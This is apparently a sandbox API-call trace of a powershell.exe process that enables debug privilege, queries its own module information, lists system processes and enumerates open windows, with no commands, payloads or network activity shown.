	[0945.251] VerQueryValueW (in: pBlock=0x2c172f0, lpSubBlock="\\", lplpBuffer=0x26dd28, puLen=0x26dd20 | out: lplpBuffer=0x26dd28*=0x2c17318, puLen=0x26dd20) returned 1
	[0945.258] GetCurrentProcessId () returned 0xd44
	[0945.273] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x26cc50 | out: lpLuid=0x26cc50*(LowPart=0x14, HighPart=0)) returned 1
	[0945.277] GetCurrentProcess () returned 0xffffffffffffffff
	[0945.278] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x26cc70 | out: TokenHandle=0x26cc70*=0x2d0) returned 1
	[0945.279] AdjustTokenPrivileges (in: TokenHandle=0x2d0, DisableAllPrivileges=0, NewState=0x2c1ab68*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0945.281] CloseHandle (hObject=0x2d0) returned 1
	[0945.285] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xd44) returned 0x2d0
	[0945.842] EnumProcessModules (in: hProcess=0x2d0, lphModule=0x2c1abd0, cb=0x200, lpcbNeeded=0x26dc88 | out: lphModule=0x2c1abd0, lpcbNeeded=0x26dc88) returned 1
	[0945.844] GetModuleInformation (in: hProcess=0x2d0, hModule=0x13f370000, lpmodinfo=0x2c1ae40, cb=0x18 | out: lpmodinfo=0x2c1ae40*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0945.845] CoTaskMemAlloc (cb=0x804) returned 0x50c950
	[0945.846] GetModuleBaseNameW (in: hProcess=0x2d0, hModule=0x13f370000, lpBaseName=0x50c950, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0945.846] CoTaskMemFree (pv=0x50c950) 
	[0945.847] CoTaskMemAlloc (cb=0x804) returned 0x50c950
	[0945.847] GetModuleFileNameExW (in: hProcess=0x2d0, hModule=0x13f370000, lpFilename=0x50c950, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0945.847] CoTaskMemFree (pv=0x50c950) 
	[0945.847] CloseHandle (hObject=0x2d0) returned 1
	[0945.855] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xd44) returned 0x2d0
	[0945.856] GetExitCodeProcess (in: hProcess=0x2d0, lpExitCode=0x26ddb8 | out: lpExitCode=0x26ddb8*=0x103) returned 1
	[0945.865] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12c1b088, Length=0x20000, ResultLength=0x26dd80 | out: SystemInformation=0x12c1b088, ResultLength=0x26dd80*=0x4a140) returned 0xc0000004
	[0946.648] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12c3b0b8, Length=0x4c940, ResultLength=0x26dd80 | out: SystemInformation=0x12c3b0b8, ResultLength=0x26dd80*=0x4a190) returned 0x0
	[0946.681] EnumWindows (lpEnumFunc=0x27266ac, lParam=0x0) 
	[0947.794] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x4d0
	[0947.794] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x558
	[0947.794] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x4d0
	[0947.794] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x4d0
	[0947.794] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x4d0
	[0947.794] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x538
	[0947.794] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x4d0
	[0947.794] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x778
	[0947.794] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x778
	[0947.794] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x4d0
	[0947.795] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x4d0
	[0947.795] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x4d0
	[0947.795] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x4d0
	[0947.795] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x4d0
	[0947.795] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x4d0
	[0947.795] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x4d0
	[0947.795] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x4d0
	[0947.795] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x460
	[0947.795] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x4d0
	[0947.795] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x4d0
	[0947.796] GetWindowThreadProcessId (in: hWnd=0x10bd6, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x2440
	[0947.796] GetWindowThreadProcessId (in: hWnd=0x10bb6, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x24d8
	[0947.796] GetWindowThreadProcessId (in: hWnd=0x10ba8, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1aa4
	[0947.796] GetWindowThreadProcessId (in: hWnd=0x10b74, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1ff0
	[0947.796] GetWindowThreadProcessId (in: hWnd=0x10b66, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1a84
	[0947.796] GetWindowThreadProcessId (in: hWnd=0x10b62, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1fb0
	[0947.796] GetWindowThreadProcessId (in: hWnd=0x10b5e, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1e10
	[0947.796] GetWindowThreadProcessId (in: hWnd=0x10b52, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x23a8
	[0947.796] GetWindowThreadProcessId (in: hWnd=0x20b46, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1f24
	[0947.796] GetWindowThreadProcessId (in: hWnd=0x20b3c, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x21ec
	[0947.797] GetWindowThreadProcessId (in: hWnd=0x20b32, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x2320
	[0947.797] GetWindowThreadProcessId (in: hWnd=0x10b28, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1fd4
	[0947.797] GetWindowThreadProcessId (in: hWnd=0x10b0c, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1880
	[0947.797] GetWindowThreadProcessId (in: hWnd=0x10af6, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1b18
	[0947.797] GetWindowThreadProcessId (in: hWnd=0x10aea, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1d6c
	[0947.797] GetWindowThreadProcessId (in: hWnd=0x10ade, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x233c
	[0947.797] GetWindowThreadProcessId (in: hWnd=0x10ad2, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x2368
	[0947.797] GetWindowThreadProcessId (in: hWnd=0x10ace, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x2124
	[0947.797] GetWindowThreadProcessId (in: hWnd=0x10aca, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x22f0
	[0947.797] GetWindowThreadProcessId (in: hWnd=0x10ac4, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x22ac
	[0947.798] GetWindowThreadProcessId (in: hWnd=0x30932, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1cdc
	[0947.798] GetWindowThreadProcessId (in: hWnd=0x308c2, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x10f0
	[0947.798] GetWindowThreadProcessId (in: hWnd=0x10ab6, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1f18
	[0947.798] GetWindowThreadProcessId (in: hWnd=0x10ab4, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x20a8
	[0947.798] GetWindowThreadProcessId (in: hWnd=0x10a78, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x2004
	[0947.798] GetWindowThreadProcessId (in: hWnd=0x10a68, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1f88
	[0947.798] GetWindowThreadProcessId (in: hWnd=0x10a4a, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1f84
	[0947.798] GetWindowThreadProcessId (in: hWnd=0x20a3e, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x2050
	[0947.798] GetWindowThreadProcessId (in: hWnd=0x40528, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1e04
	[0947.798] GetWindowThreadProcessId (in: hWnd=0x20816, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1ecc
	[0947.799] GetWindowThreadProcessId (in: hWnd=0x10a2c, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1e64
	[0947.799] GetWindowThreadProcessId (in: hWnd=0x2056e, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1b58
	[0947.799] GetWindowThreadProcessId (in: hWnd=0x10a1e, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1e94
	[0947.799] GetWindowThreadProcessId (in: hWnd=0x10a0e, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1e28
	[0947.799] GetWindowThreadProcessId (in: hWnd=0x10a0a, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1df8
	[0947.799] GetWindowThreadProcessId (in: hWnd=0x10a06, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1da8
	[0947.799] GetWindowThreadProcessId (in: hWnd=0x3060a, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1c70
	[0947.799] GetWindowThreadProcessId (in: hWnd=0x109ec, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x163c
	[0947.799] GetWindowThreadProcessId (in: hWnd=0x109de, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1a10
	[0947.799] GetWindowThreadProcessId (in: hWnd=0x109c4, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x186c
	[0947.800] GetWindowThreadProcessId (in: hWnd=0x109b4, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1d74
	[0947.800] GetWindowThreadProcessId (in: hWnd=0x1099a, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x4c8
	[0947.800] GetWindowThreadProcessId (in: hWnd=0x1098c, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1960
	[0947.800] GetWindowThreadProcessId (in: hWnd=0x1097c, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1ce4
	[0947.800] GetWindowThreadProcessId (in: hWnd=0x1093c, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1b24
	[0947.800] GetWindowThreadProcessId (in: hWnd=0x20942, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x14e0
	[0947.800] GetWindowThreadProcessId (in: hWnd=0x204b0, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x17f0
	[0947.800] GetWindowThreadProcessId (in: hWnd=0x10952, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x854
	[0947.800] GetWindowThreadProcessId (in: hWnd=0x10950, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1268
	[0947.800] GetWindowThreadProcessId (in: hWnd=0x1094e, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1624
	[0947.801] GetWindowThreadProcessId (in: hWnd=0x1094c, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1b9c
	[0947.801] GetWindowThreadProcessId (in: hWnd=0x1094a, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x16f4
	[0947.801] GetWindowThreadProcessId (in: hWnd=0x10948, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x145c
	[0947.801] GetWindowThreadProcessId (in: hWnd=0x1093e, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x17d0
	[0947.801] GetWindowThreadProcessId (in: hWnd=0x206ba, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1d28
	[0947.801] GetWindowThreadProcessId (in: hWnd=0x1093a, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0xcb8
	[0947.801] GetWindowThreadProcessId (in: hWnd=0x20614, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1190
	[0947.801] GetWindowThreadProcessId (in: hWnd=0x2041c, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x3a8
	[0947.801] GetWindowThreadProcessId (in: hWnd=0x20420, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1bd0
	[0947.801] GetWindowThreadProcessId (in: hWnd=0x304c0, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1bfc
	[0947.802] GetWindowThreadProcessId (in: hWnd=0x108b8, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1a78
	[0947.802] GetWindowThreadProcessId (in: hWnd=0x108b2, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1b90
	[0947.802] GetWindowThreadProcessId (in: hWnd=0x108ac, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1b04
	[0947.802] GetWindowThreadProcessId (in: hWnd=0x108a0, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1b34
	[0947.802] GetWindowThreadProcessId (in: hWnd=0x1088e, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1b64
	[0947.802] GetWindowThreadProcessId (in: hWnd=0x1087c, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1bb0
	[0947.802] GetWindowThreadProcessId (in: hWnd=0x204f6, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1acc
	[0947.802] GetWindowThreadProcessId (in: hWnd=0x1083e, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1a2c
	[0947.802] GetWindowThreadProcessId (in: hWnd=0x2042c, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x19a8
	[0947.802] GetWindowThreadProcessId (in: hWnd=0x10836, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1944
	[0947.803] GetWindowThreadProcessId (in: hWnd=0x10826, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x18c8
	[0947.803] GetWindowThreadProcessId (in: hWnd=0x10822, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x18ac
	[0947.803] GetWindowThreadProcessId (in: hWnd=0x1081e, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x18ec
	[0947.803] GetWindowThreadProcessId (in: hWnd=0x1081a, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1898
	[0947.803] GetWindowThreadProcessId (in: hWnd=0x10810, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0xc98
	[0947.803] GetWindowThreadProcessId (in: hWnd=0x1080a, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x153c
	[0947.803] GetWindowThreadProcessId (in: hWnd=0x10806, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1808
	[0947.803] GetWindowThreadProcessId (in: hWnd=0x10790, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x12a4
	[0947.803] GetWindowThreadProcessId (in: hWnd=0x1078e, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1740
	[0947.803] GetWindowThreadProcessId (in: hWnd=0x10784, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x16c4
	[0947.804] GetWindowThreadProcessId (in: hWnd=0x107c2, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1820
	[0947.804] GetWindowThreadProcessId (in: hWnd=0x107b4, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x16ac
	[0947.804] GetWindowThreadProcessId (in: hWnd=0x1079a, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1858
	[0947.804] GetWindowThreadProcessId (in: hWnd=0x1077e, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1664
	[0947.804] GetWindowThreadProcessId (in: hWnd=0x10778, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x10b4
	[0947.804] GetWindowThreadProcessId (in: hWnd=0x10774, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x10ac
	[0947.804] GetWindowThreadProcessId (in: hWnd=0x20378, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x10ec
	[0947.804] GetWindowThreadProcessId (in: hWnd=0x10766, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1068
	[0947.804] GetWindowThreadProcessId (in: hWnd=0x10762, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x17e0
	[0947.804] GetWindowThreadProcessId (in: hWnd=0x1075e, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x102c
	[0947.804] GetWindowThreadProcessId (in: hWnd=0x1075a, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x17a4
	[0947.805] GetWindowThreadProcessId (in: hWnd=0x2035a, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1050
	[0947.805] GetWindowThreadProcessId (in: hWnd=0x1072c, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1694
	[0947.805] GetWindowThreadProcessId (in: hWnd=0x1071e, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1770
	[0947.805] GetWindowThreadProcessId (in: hWnd=0x10710, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1720
	[0947.805] GetWindowThreadProcessId (in: hWnd=0x10702, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x165c
	[0947.805] GetWindowThreadProcessId (in: hWnd=0x106ca, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1578
	[0947.805] GetWindowThreadProcessId (in: hWnd=0x204a6, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x16c0
	[0947.805] GetWindowThreadProcessId (in: hWnd=0x106c4, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x161c
	[0947.805] GetWindowThreadProcessId (in: hWnd=0x106c0, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1638
	[0947.805] GetWindowThreadProcessId (in: hWnd=0x20362, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x15c8
	[0947.806] GetWindowThreadProcessId (in: hWnd=0x106be, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1554
	[0947.806] GetWindowThreadProcessId (in: hWnd=0x106bc, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1674
	[0947.806] GetWindowThreadProcessId (in: hWnd=0x106b4, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1520
	[0947.806] GetWindowThreadProcessId (in: hWnd=0x1068e, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x14bc
	[0947.806] GetWindowThreadProcessId (in: hWnd=0x1067e, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0xf8c
	[0947.807] GetWindow (hWnd=0x1067e, uCmd=0x4) returned 0x0
	[0947.808] IsWindowVisible (hWnd=0x1067e) returned 0
	[0947.808] GetWindowThreadProcessId (in: hWnd=0x1066e, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0xe9c
	[0947.808] GetWindowThreadProcessId (in: hWnd=0x1065e, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1434
	[0947.808] GetWindowThreadProcessId (in: hWnd=0x1064e, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x14ec
	[0947.808] GetWindowThreadProcessId (in: hWnd=0x1063e, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0xfcc
	[0947.808] GetWindowThreadProcessId (in: hWnd=0x1062e, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x12ac
	[0947.808] GetWindowThreadProcessId (in: hWnd=0x1062a, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1484
	[0947.808] GetWindowThreadProcessId (in: hWnd=0x10626, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x934
	[0947.808] GetWindowThreadProcessId (in: hWnd=0x10622, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0xc0c
	[0947.808] GetWindowThreadProcessId (in: hWnd=0x1061c, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0xb08
	[0947.809] GetWindowThreadProcessId (in: hWnd=0x10610, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x948
	[0947.809] GetWindowThreadProcessId (in: hWnd=0x1060c, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1178
	[0947.809] GetWindowThreadProcessId (in: hWnd=0x105fa, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x13e0
	[0947.809] GetWindowThreadProcessId (in: hWnd=0x105ea, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0xcd0
	[0947.809] GetWindowThreadProcessId (in: hWnd=0x105da, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x13fc
	[0947.809] GetWindowThreadProcessId (in: hWnd=0x105c6, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0xdc8
	[0947.809] GetWindowThreadProcessId (in: hWnd=0x105b6, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0xc18
	[0947.809] GetWindowThreadProcessId (in: hWnd=0x105a6, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0xc2c
	[0947.809] GetWindowThreadProcessId (in: hWnd=0x10580, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0xa1c
	[0947.809] GetWindowThreadProcessId (in: hWnd=0x10578, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1244
	[0947.810] GetWindowThreadProcessId (in: hWnd=0x10574, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0xdb0
	[0947.810] GetWindowThreadProcessId (in: hWnd=0x20356, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1398
	[0947.810] GetWindowThreadProcessId (in: hWnd=0x10566, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1358
	[0947.810] GetWindowThreadProcessId (in: hWnd=0x10562, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1370
	[0947.810] GetWindowThreadProcessId (in: hWnd=0x1055e, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1340
	[0947.810] GetWindowThreadProcessId (in: hWnd=0x10558, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x130c
	[0947.810] GetWindowThreadProcessId (in: hWnd=0x10550, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x12c0
	[0947.810] GetWindowThreadProcessId (in: hWnd=0x2053a, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x12e4
	[0947.810] GetWindowThreadProcessId (in: hWnd=0x1051a, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1270
	[0947.810] GetWindowThreadProcessId (in: hWnd=0x1050a, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1298
	[0947.811] GetWindowThreadProcessId (in: hWnd=0x104fa, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x120c
	[0947.811] GetWindowThreadProcessId (in: hWnd=0x204d6, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x122c
	[0947.811] GetWindowThreadProcessId (in: hWnd=0x104ce, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x11c4
	[0947.811] GetWindowThreadProcessId (in: hWnd=0x202d6, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x11b0
	[0947.811] GetWindowThreadProcessId (in: hWnd=0x104c8, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1188
	[0947.811] GetWindowThreadProcessId (in: hWnd=0x104c4, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1148
	[0947.811] GetWindowThreadProcessId (in: hWnd=0x202e6, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1160
	[0947.811] GetWindowThreadProcessId (in: hWnd=0x30272, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x10fc
	[0947.811] GetWindowThreadProcessId (in: hWnd=0x104bc, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0xe34
	[0947.811] GetWindowThreadProcessId (in: hWnd=0x104ac, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0xea4
	[0947.811] GetWindowThreadProcessId (in: hWnd=0x1048e, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x514
	[0947.812] GetWindowThreadProcessId (in: hWnd=0x1047e, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0xe48
	[0947.812] GetWindowThreadProcessId (in: hWnd=0x1046e, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0xbc8
	[0947.812] GetWindowThreadProcessId (in: hWnd=0x1045e, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0xdf8
	[0947.812] GetWindowThreadProcessId (in: hWnd=0x1044c, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x318
	[0947.812] GetWindowThreadProcessId (in: hWnd=0x10440, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0xcac
	[0947.812] GetWindowThreadProcessId (in: hWnd=0x10438, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x8bc
	[0947.812] GetWindowThreadProcessId (in: hWnd=0x10434, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0xf9c
